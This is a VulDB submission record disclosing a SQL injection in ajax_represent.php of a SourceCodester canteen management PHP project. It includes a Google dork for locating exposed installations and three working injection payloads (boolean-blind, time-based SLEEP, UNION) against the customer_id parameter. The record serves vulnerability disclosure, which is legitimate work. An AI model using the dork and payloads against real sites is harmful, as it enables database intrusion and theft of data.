| Título | Canteen Management System ajax_represent.php sql injection |
|---|
| Descrição | Canteen Management System ajax_represent.php sql injection
inurl:youthappam/php_action/ajax_represent.php
Abstract:
Line 27 of ajax_represent.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
1. Data enters a program from an untrusted source.
2. The data is used to dynamically construct a SQL query.
In this case, the data is passed to query() in ajax_represent.php at line 27.
payload:
Parameter: customer_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: customer_id=1' AND 4961=4961 AND 'mqPP'='mqPP
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: customer_id=1' AND (SELECT 6401 FROM (SELECT(SLEEP(5)))eypH) AND 'vuyE'='vuyE
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: customer_id=-9319' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7671,0x6c415159714766417374776d5443614642596d75705455494944776c49436974744d56574146766d,0x7171717871),NULL,NULL,NULL,NULL-- -
Download Code:
https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html |
|---|
| Fonte | ⚠️ https://blog.csdn.net/hzwsuki/article/details/128277038 |
|---|
| Utilizador | huangsir (UID 37291) |
|---|
| Submissão | 11/12/2022 11h15 (há 4 anos) |
|---|
| Moderação | 11/12/2022 12h30 (1 hour later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 215272 [SourceCodester Canteen Management System ajax_represent.php customer_id Injeção SQL] |
|---|
| Pontos | 20 |
|---|